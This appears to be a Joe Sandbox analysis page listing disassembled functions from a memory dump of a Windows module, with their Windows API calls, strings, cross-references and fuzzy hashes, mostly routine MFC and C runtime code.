KERNEL32.DLL, xrefs: 6FD1A12B, 6FD1A130, 6FD1A13B

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: a4a2e7593a99fc56b638b2a20eb53091acc885a4e959f5fc4ad9792c011e7ec5
Instruction ID: b4faa65a72a7548698dbf44b099910b549072e45152b45a16fdbb75f5fd8f695
Opcode Fuzzy Hash: a4a2e7593a99fc56b638b2a20eb53091acc885a4e959f5fc4ad9792c011e7ec5
Instruction Fuzzy Hash: B711A572808B01DFE7A1DF79D804B5ABBE4AF45328F108519D5A9972D0CB34B585CFA4

Function 6FD084DA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FD08503
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FD08520
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FD0852D
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FD0853A
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FD08547

Strings

ActivateActCtx, xrefs: 6FD0852F
CreateActCtxW, xrefs: 6FD0851A
ReleaseActCtx, xrefs: 6FD08522
DeactivateActCtx, xrefs: 6FD0853C
KERNEL32, xrefs: 6FD084FE

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-2424895508
Opcode ID: c76eee13037fb6ca02be32fdaaee9c186c0bd7221ce8129da4f3e29b34c23b07
Instruction ID: 59c4c6793e9a4aa682f0c5467dd5ca7de6fcc7f1dc08300f8a92182571859829
Opcode Fuzzy Hash: c76eee13037fb6ca02be32fdaaee9c186c0bd7221ce8129da4f3e29b34c23b07
Instruction Fuzzy Hash: 1F1146B680D792EFAFB1AF55898E40ABFA4AA47325308443FE30597140DA307464CE51

Function 6FD0A59C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32,6FD0A6B6), ref: 6FD0A5AA
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FD0A5CB
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FD0A5DD
GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FD0A5EF
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FD0A601

Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4

Strings

ActivateActCtx, xrefs: 6FD0A5DF
CreateActCtxW, xrefs: 6FD0A5C5
ReleaseActCtx, xrefs: 6FD0A5CD
DeactivateActCtx, xrefs: 6FD0A5F1
KERNEL32, xrefs: 6FD0A5A5

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 417325364-2424895508
Opcode ID: d480feacb68732ceb47d712e485d8a3500fbae4ab41a2c8b075c732848ed9cf4
Instruction ID: c68565b9a2ebaadd85770eb0bbb9bd019250ebd06d1dc84702ea0d6c01bb448e
Opcode Fuzzy Hash: d480feacb68732ceb47d712e485d8a3500fbae4ab41a2c8b075c732848ed9cf4
Instruction Fuzzy Hash: 90F0A97AC0DB35BFEFE15F759D055057EA8A7073797088417AB0092100DBB4B068CF91

Function 6FD11861 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6FD11868
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FD11877
CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FD118D1

Part of subcall function 6FD10C2C: GetWindowRect.USER32(?,10000000), ref: 6FD10C56

SetWindowLongW.USER32(?,000000FC,?), ref: 6FD118F8
RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FD11900
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FD11907
GlobalDeleteAtom.KERNEL32(?), ref: 6FD11911
CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FD11965

Strings

AfxOldWndProc423, xrefs: 6FD11870, 6FD11875, 6FD118FE, 6FD11906

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: fbd05d2a5be1a9a69d5bb1d13674b4793385e8b11957af1535d42d1b0792a73a
Instruction ID: d39830a2174c5cafcdbdf0f1cd3d0a90f525e5b969fa147dfbeb8e087be3474d
Opcode Fuzzy Hash: fbd05d2a5be1a9a69d5bb1d13674b4793385e8b11957af1535d42d1b0792a73a
Instruction Fuzzy Hash: 59314F3240921AABDF41EFE4ED48DBF7A7CAF16315F044116F611A6190CB35A921EBB1

Function 6FD01C00 Relevance: 13.7, APIs: 9, Instructions: 159fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FD01BE9,?,?,?,?), ref: 6FD01C39
GetLastError.KERNEL32(?,?,?,?,?,6FD01BE9,?,?,?,?), ref: 6FD01C48
__aullrem.LIBCMT ref: 6FD01C60
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FD01CE8
_memset.LIBCMT ref: 6FD01CF5
SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FD01BE9,?,?,?,?), ref: 6FD01D07

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: File$Pointer$ErrorLastRead__aullrem_memset
String ID:
API String ID: 123228641-0
Opcode ID: c0738c0aa17538f0201b316309ab81dd506d552fa6daaab1cd2dc690836e1284
Instruction ID: 7950df866e31292fc7998d231bcd09e5e312de5d11681d812bd53876c75e4c41
Opcode Fuzzy Hash: c0738c0aa17538f0201b316309ab81dd506d552fa6daaab1cd2dc690836e1284
Instruction Fuzzy Hash: 08512F71A08711AFD780DF29D844B9BB7E8FF88758F14492AF958D7240E770F9048BA2

Function 6FD0BE0D Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6FD0BE14
RtlEnterCriticalSection.NTDLL(00000000), ref: 6FD0BE25
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?,?,?,?), ref: 6FD0BE43
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?), ref: 6FD0BE77
RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BEE3
_memset.LIBCMT ref: 6FD0BF02
TlsSetValue.KERNEL32(?,00000000), ref: 6FD0BF13
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FD0BF34

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 655a7997727964df74d340265ec914760693632e8a8a4f067e3fdf90d13ea65e
Instruction ID: 9998bb576608cfcf5e6c79a88300bbe076afde959be3b20c53a6affd66c2ec3d
Opcode Fuzzy Hash: 655a7997727964df74d340265ec914760693632e8a8a4f067e3fdf90d13ea65e
Instruction Fuzzy Hash: 43318C75408605EFEB51EF64C88486ABBB1EF01324B10C62AE6559B6D0CB32B950CFA0

Function 6FD081FA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FD0815A: GetParent.USER32(?), ref: 6FD081AE
Part of subcall function 6FD0815A: GetLastActivePopup.USER32(?), ref: 6FD081BF
Part of subcall function 6FD0815A: IsWindowEnabled.USER32(?), ref: 6FD081D3
Part of subcall function 6FD0815A: EnableWindow.USER32(?,00000000), ref: 6FD081E6

EnableWindow.USER32(?,00000001), ref: 6FD08247
GetWindowThreadProcessId.USER32(?,?), ref: 6FD0825B
GetCurrentProcessId.KERNEL32(?,?), ref: 6FD08265
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FD0827D
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FD082F9
EnableWindow.USER32(00000000,00000001), ref: 6FD08340

Strings

0, xrefs: 6FD082D2

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 0f098abe976199940c5c06d004c0d268874b421f5c708756b657cf60685a1e37
Instruction ID: b4e2513db3ba87d0ce1991d628b6fae4397c09000753b19287951e7f6be0c650
Opcode Fuzzy Hash: 0f098abe976199940c5c06d004c0d268874b421f5c708756b657cf60685a1e37
Instruction Fuzzy Hash: 5D419372A45719DBDB90EF74CC88BDAB7B4FF55310F140599E914E6180D770F9908B90

Function 6FD0DE96 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FD0DED6
SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FD0DF00
GetSystemMetrics.USER32(00000000), ref: 6FD0DF17
GetSystemMetrics.USER32(00000001), ref: 6FD0DF1E
MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FD0DF49

Strings

B, xrefs: 6FD0DEE0
DISPLAY, xrefs: 6FD0DF40

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: System$ByteCharMetricsMultiWide$InfoParameters
String ID: B$DISPLAY
API String ID: 381819527-3316187204
Opcode ID: a0e6617b1e7aa37b5bdd75c5fa8fa9fce00ce6df2e578f4a78a3e3e2b872f9fd
Instruction ID: af7976411add31584e733e3bc13537ff410e7f0145d9dd1d73206358895e4d18
Opcode Fuzzy Hash: a0e6617b1e7aa37b5bdd75c5fa8fa9fce00ce6df2e578f4a78a3e3e2b872f9fd
Instruction Fuzzy Hash: 1721A771508720EBEF50AF148C84A5B7BAAEF46760F158217FE189A184DEB1F440CBE1

Function 6FD0CD66 Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 6FD0CD75
GetSystemMetrics.USER32(0000000C), ref: 6FD0CD7C
GetSystemMetrics.USER32(00000002), ref: 6FD0CD83
GetSystemMetrics.USER32(00000003), ref: 6FD0CD8D
GetDC.USER32(00000000), ref: 6FD0CD97
GetDeviceCaps.GDI32(00000000,00000058), ref: 6FD0CDA8
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FD0CDB0
ReleaseDC.USER32(00000000,00000000), ref: 6FD0CDB8

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: e903bc0b1ed7ceddcd40dd5f9cb102ed4fd659b18bafef723e637ee15ca408ee
Instruction ID: dccdbcf8306ac153a5b520e1fbb734e07fda899dd207a562dc1de9536160e383
Opcode Fuzzy Hash: e903bc0b1ed7ceddcd40dd5f9cb102ed4fd659b18bafef723e637ee15ca408ee
Instruction Fuzzy Hash: BEF01DB1E44B14BAFB106B728C89F167F68EB46771F088517E7059B2C0DAB5A8618FD0

Function 6FD1020C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FD1029B
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FD102C4
GetWindowLongW.USER32(?,000000FC), ref: 6FD102D6
GetWindowLongW.USER32(?,000000FC), ref: 6FD102E7
SetWindowLongW.USER32(?,000000FC,?), ref: 6FD10303

Strings

,, xrefs: 6FD102BA

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: cfec290b551505cd33e9f11fca3ebccbd31ba69a431b7346e77372cf86e6691a
Instruction ID: ac98b628d03ab9711a09c95246fa957cd6e0706880a9c4d7c98f045c1b747be9
Opcode Fuzzy Hash: cfec290b551505cd33e9f11fca3ebccbd31ba69a431b7346e77372cf86e6691a
Instruction Fuzzy Hash: 7131EE30608700DFDB50FFB4E888A99BBB4BF49354B10122EE5559B691DB30F810CB90

Function 6FD0A200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FD0A20A
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FD0A2F0
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FD0A30D
RegCloseKey.ADVAPI32(?), ref: 6FD0A32D
RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FD0A348

Strings

Software\, xrefs: 6FD0A26E

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 6349ef520305642d0ae876f02bb8b23a36685bd40f81e81cc217521f849f1d23
Instruction ID: 95c50418d06adb2a4857123ea346abc146aced4ae4b841dd44fb3ef3f4c65a97
Opcode Fuzzy Hash: 6349ef520305642d0ae876f02bb8b23a36685bd40f81e81cc217521f849f1d23
Instruction Fuzzy Hash: D841A331801619ABDB61FFA4DC88EDEB7B8AF49318F1402D9E105A2190DB34BB84DF60

Function 6FD0A082 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6FD0A08C
RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FD0A11A
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FD0A13D

Part of subcall function 6FD0A02D: __EH_prolog3.LIBCMT ref: 6FD0A034

Strings

Software\Classes\, xrefs: 6FD0A0CD

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: 71bfc604896d90f54abc834ba58c9b4f50e6b71d011ee8ece604a1593f5839ca
Instruction ID: b731410efc3489f42a99278a523fc4e81608155a672c237608d87e31433930a4
Opcode Fuzzy Hash: 71bfc604896d90f54abc834ba58c9b4f50e6b71d011ee8ece604a1593f5839ca
Instruction Fuzzy Hash: 5C316032C04228AADB61AFA4DC48BDDB7B4AF09324F1402D5E95967290DB706F84DFA1

Function 6FD0D07E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FD0D0AE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FD0D0D1
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FD0D0ED
RegCloseKey.ADVAPI32(?), ref: 6FD0D0FD
RegCloseKey.ADVAPI32(?), ref: 6FD0D107

Strings

software, xrefs: 6FD0D096

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 2e3eca0a2079ce632542d3fe3d1577611339bf679839b9952660e0d06ef98f08
Instruction ID: 98d2ea82be79f9c950fb4e7a20c8eae978d3b0b60a635ca7fa28a24acacea048
Opcode Fuzzy Hash: 2e3eca0a2079ce632542d3fe3d1577611339bf679839b9952660e0d06ef98f08
Instruction Fuzzy Hash: E5111972D00119FBDB11DF8ACD88DDFBFBDEFC5750B10406AA604A2111DA30AA00EBA0

Function 6FD0BEAE Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BEB5
__CxxThrowException@8.LIBCMT ref: 6FD0BEBF

Part of subcall function 6FD1527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6FD152BD

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?), ref: 6FD0BED6
RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BEE3

Part of subcall function 6FD06D89: __CxxThrowException@8.LIBCMT ref: 6FD06D9F

_memset.LIBCMT ref: 6FD0BF02
TlsSetValue.KERNEL32(?,00000000), ref: 6FD0BF13
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FD0BF34

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 28b8465cae00fe94caf2c4e2f129a066d6a4bc1b3cbb6f2e421c403d68531806
Instruction ID: 3aa481b97e0a304584138a5bcb1d9679afc64ccd65318968b7988af031d1aa3a
Opcode Fuzzy Hash: 28b8465cae00fe94caf2c4e2f129a066d6a4bc1b3cbb6f2e421c403d68531806
Instruction Fuzzy Hash: F5118E75508605AFEB51EF64C885D2ABBB6FF01324710C52AE655969A0CB31BC60CFA0

Function 6FD0CA77 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000), ref: 6FD0CA85
SetErrorMode.KERNEL32(00000000), ref: 6FD0CA8D

Part of subcall function 6FD0A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FD0A6D0
Part of subcall function 6FD0A698: SetLastError.KERNEL32(0000006F), ref: 6FD0A6E7

GetModuleHandleW.KERNEL32(user32.dll), ref: 6FD0CADC
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FD0CAEC

Strings

user32.dll, xrefs: 6FD0CAD7
NotifyWinEvent, xrefs: 6FD0CAE6

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Error$ModeModule$AddressFileHandleLastNameProc
String ID: NotifyWinEvent$user32.dll
API String ID: 1146408833-597752486
Opcode ID: 47956ad18a9bcbf1492bb9e3fe85148a706a527f68a9ace41a0983ce641ac442
Instruction ID: fe9bbc84245ff55ffecf9d50719a6308459e720be6726dc45f0ba28b7af59113
Opcode Fuzzy Hash: 47956ad18a9bcbf1492bb9e3fe85148a706a527f68a9ace41a0983ce641ac442
Instruction Fuzzy Hash: 65018F72A043149FDB95FF65D844A5A3BE8AF45324B09805AFA45DB281DF31F840CFB6

Function 6FD0CD20 Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 6FD0CD2E
GetSysColor.USER32(00000010), ref: 6FD0CD35
GetSysColor.USER32(00000014), ref: 6FD0CD3C
GetSysColor.USER32(00000012), ref: 6FD0CD43
GetSysColor.USER32(00000006), ref: 6FD0CD4A
GetSysColorBrush.USER32(0000000F), ref: 6FD0CD57
GetSysColorBrush.USER32(00000006), ref: 6FD0CD5E

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 0c3e30cea5172b4b2e7922a8625d18c992065803800c063af39add1903620324
Instruction ID: d8befd3e4dcb01ffcba0be8c4818313711f9477ec5d00ed0f40cb0f12c433bef
